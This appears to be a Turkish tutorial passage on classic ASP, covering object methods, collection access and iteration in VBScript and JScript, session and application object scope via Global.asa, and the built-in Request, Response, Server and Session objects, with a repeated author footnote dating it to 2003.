CLASSID=”Clsid:1621F7C0-60AC-11CF-9427-444553540000″></OBJECT>

Bir Nesneye Ait Metodların Çağırılması

Metod, bir nesne üzerinde ya da bir nesne ile birlikte uygulayabileceğiniz bir iş / harekettir. Bir metodu çağırmak için kullanılan genel sözdizimi:
Nesne.Metod parametereler
Parametreler metoda göre değişir.
Örneğin Response standart nesnesinin Write metodunu aşağıdaki gibi kullanarak tarayıcıya bilgi gönderebilirsiniz:

<% Response.Write “Merhaba” %>

NOT: Bazı betik dilleri Nesne.Metod sözdizimini desteklemez. Sizin diliniz desteklemiyorsa, Windows kayıtlarına (registry) bir kayıt eklemelisiniz.

Not; Bu yazı 04 Aralık 2003 tarihinde http://www.sorucevap.com/uyeler/dersler.asp?maxiturk adresinde tarafımca yayınlanmıştır.

Kolay Gelsin

Bir Elemana Adı ya da Dizin Numarasıyla Erişmek
Koleksiyondaki özel bir elemana adıyla erişebilirsiniz. Örneğin Contents koleksiyonu Session nesnesinde saklanan değişkenleri tutar. Ayrıca Server.CreateObject ile yaratılan bütün nesneleri de tutar. Aşağıdaki bilgileri Session nesnesinde sakladığınızı düşünün:

<%
Session.Contents(”Adi”) = “Mustafa”
Session.Contents(”Soyadi”) = “Aydıner”
%>

Bir nesneye, o nesneyi koleksiyona saklarken kullandığınız isimle erişebilirsiniz. Örneğin aşağıdaki deyim “Mustafa” kelimesini döndürür:

<%= Session.Contents(”Adi”) %>

Bir elemana aynı zamanda onunla ilgili bir dizin numarasıyla da erişebilirsiniz. Örneğin aşağıdaki deyim Session nesnesinin ikinci alanındaki bilgiyi döndürür.

<%= Session.Contents(2) %>

ASP koleksiyonları 1 le başlayarak numaralandırılır. Bir elemanla ilişkili numara koleksiyona eleman eklendikçe ya da koleksiyondan eleman silindikçe değişebilir. Eleman numarasının aynı kalacağını düşünmemelisiniz. Dizinli erişim genelde takip eden kesimde anlatıldığı gibi bir koleksiyonun elemanlarına sıradan erişmek gerektiğinde ya da yalnız okunur bir koleksiyona erişildiğinde kullanınır.

Bir Koleksiyona Sıradan Erişim
Bir koleksiyonun elemanlarına sıradan da erişebilirsiniz. Koleksiyona sıradan erişmek için koleksiyonun ismini kullanmalısınız. Örneğin VBScript’in For..Each deyimlerini kullanarak Session nesnesinde sakladığınız elemanlara erişebilirsiniz:

<%
Dim Item

For Each Item in Session.Contents
Response.Write Session.Contents(Item) & “<BR>”
Next
%>

Bir koleksiyonda saklanan elemanların sayısını belirlemek için Count deyimi kullanılır. Count deyimi, VBScript’in For..Next deyimleri ile kullanılarak da koleksiyonun elemanlarına sıradan erişilebilir:

<%
Dim Item

For Item = 1 to Session.Contents.Count
Response.Write Session.Contents(Item) & “<BR>”
Next
%>

JScript’te de for deyimi kullanarak koleksiyonun elemanlarına erişebilirsiniz. Aşağıdaki örnekteki tekniği kullanmanız tavsiye edilir:

<%
var item, numitems;
numitems = Session.Contents.Count;
for (item = 1; item <= numitems; item++) {
Response.Write(Session.Contents(item) + “<BR>”)
}
%>

Microsoft JScript sürüm 3.0 da tanıtılan Enumerator nesnesini de bu amaçla kullanabilirsiniz:

<%
var mycoll = new Enumerator(Session.Contents);

while (!mycoll.atEnd()) {
var x = mycoll.item();
Response.Write(Session.Contents(x) + “<BR>”);
mycoll.moveNext();
}
%>

Not; Bu yazı 04 Aralık 2003 tarihinde http://www.sorucevap.com/uyeler/dersler.asp?maxiturk adresinde tarafımca yayınlanmıştır.

Kolay Gelsin

Visual Basic ya da VBScript ile programlama yaptıysanız, ASP sayfayı işlemeyi bitirene kadar bir nesneyi bırakamamanıza dikkat edin. Örneğin aşağıdaki VBScript ifadesi bir nesneyi bırakmak için kullanılır:

Set myObj = Nothing

Bu ifadeyi bir ASP sayfasında kullanırsanız, myObj yi kullanmaya ilişkin her deneme tahmin edildiği gibi bir hata kodu döndürecektir. Ama aslında ASP siz nesneyi bıraktıktan sonra da o nesneye atanan kaynakları tutar ve sayfanın işlenmesi bitenen kadar da bu sürer.

Nesnelerin sayfa etkinlik alanları olduğu için kodla bırakılabileceklerine güvenmeyin. Örneğin aşağıdaki döngü 1001 tane Connection nesnesi yaratır ve bu da büyük bir SQL sunucu üzerindeki bağlantılardan bile birçoğunu açar:

<%
For I = 0 to 1000
Set Conn = Server.CreateObject(”ADODB.Connection”)
Conn.Open “connection string”
Next
%>

Bir Nesneye Oturum Etkinlik Alanı Atanması
Oturum etkinlik alanına sahip bir nesne her yeni oturum için yaratılır ve oturum sona erince bırakılır; yani her aktif oturum için bir nesne vardır. Oturum etkinlik alanı, birden çok betik tarafından kullanılan ama tek bir kullnıcı oturumunu etkileyen nesneler için kullanılır.

Bir nesneye oturum etkinlik alanı atamak için nesneyi ASP nin standart Session nesnesinde saklayın. Global.asa dosyasında <OBJECT> etiketini kullanarak ya da bir ASP sayfasında Server.CreateObject metodunu kullanarak oturum etkinlik alanı olan bir nesne yaratabilirsiniz.

Global.asa dosyasında <OBJECT> etiketini RUNAT (Server atanmalıdır) ve SCOPE (Session atanmalıdır) deyimleri ile genişleterek kullanabilirsiniz. Örneğin:

<OBJECT RUNAT=Server SCOPE=Session ID=MyAd PROGID=”MSWC.Adrotator”>
</OBJECT>

Nesneyi Session nesnesi içinde sakladıktan sonra nesneye uygulamadaki herhangi bir sayfadan erişebilirsiniz. Aşağıdaki ifade bir önceki örnekte <OBJECT> etiketi ile yaratılan nesneyi kullanmaktadır:

<%= MyAd.GetAdvertisement(”addata.txt”) %>

Bir ASP sayfasında Server.CreateObject metoduyla bir nesneyi Session nesnesinde tutabilirsiniz. Örneğin:

<% Set Session(”MyAd”) = Server.CreateObject(”MSWC.Adrotator”) %>

Nesneyi aşağıdaki gibi kullanabilirsiniz:

<% Set MyAd = Session(”MyAd”) %>
<%= MyAd.GetAdvertisement(”addata.txt”) %>

Nesnelere Uygulama Etkinlik Alanı Atanması
Uygulama etkinlik alanına sahip bir nesne, uygulama başlayınca yaratılan bir nesnedir. Bu nesne tüm istemcilerce paylaşılır. Çok az durumda bir nesneye uygulama etkinlik alanı vermelisiniz. Sayaçlar gibi bazı nesnelere uygulama etkinlik alanı verilebilir ama genelde takip eden kesimde önerilen alternatifleri kullanmalısınız.

Bir nesneye uygulama etkinlik alanı vermek için nesneyi ASP nin standart Application nesnesinde saklayın. Bunu yapmak için Global.asa dosyasında <OBJECT> etiketi kullanabilir ya da bir ASP sayfasında Server.CreateObject kullanabilirsiniz.

Not; Bu yazı 04 Aralık 2003 tarihinde http://www.sorucevap.com/uyeler/dersler.asp?maxiturk adresinde tarafımca yayınlanmıştır.

Kolay Gelsin

Request Nesnesi
Request nesnesini bir HTTP istemiyle gelen bütün bilgilere erişmek için kullanabilirsiniz. Bu, bir HTML formundan POST veya GET ile iletilen parametreleri, çeşitli “cookie” leri vs. içerir. Request nesnesi aynı zamanda sunucuya gönderilen ikili verilere (sunucuya gönderilen ikili dosyalar gibi) de erişmenizi sağlar.

Response Nesnesi
Response nesnesiyle bir kullanıcıya gönderdiğiniz bilgiyi kontrol edersiniz. Bu bilgiyi doğrudan tarayıcıya göndermek ya da tarayıcıyı başka bir URL ye yönlendirmek şeklinde olabilir.

Server Nesnesi
Server nesnesi, sunucudaki metod ve özelliklere erişimi sağlar. En sık kullanılanı bir ActiveX nesnesinin bir örneğini yaratan Server.CreateObject metodudur. Diğer metodlar bir betiğin zaman sınırını belirlemek, karakter dizilerine URL ya da HTML kodlaması atama gibi işler yapar.

Session Nesnesi
Session nesnesini belli bir kullanıcı oturumuna ilişkin bilgi saklamak için kullanırsınız. Session nesnesinde saklanan değişkenler, kullanıcı uygulamanın sayfaları arasında gezindikçe atılmaz, aksine bu değişkenler kullanıcı uygulama sayfalarına eriştiği sürece kalır.

ObjectContext Nesnesi
ObjectContext nesnesini bir ASP betiği ile yapılan bir işlemi işlemek ya da iptal etmek için kullanabilirsiniz.

Not; Bu yazı 04 Aralık 2003 tarihinde http://www.sorucevap.com/uyeler/dersler.asp?maxiturk adresinde tarafımca yayınlanmıştır.

Kolay Gelsin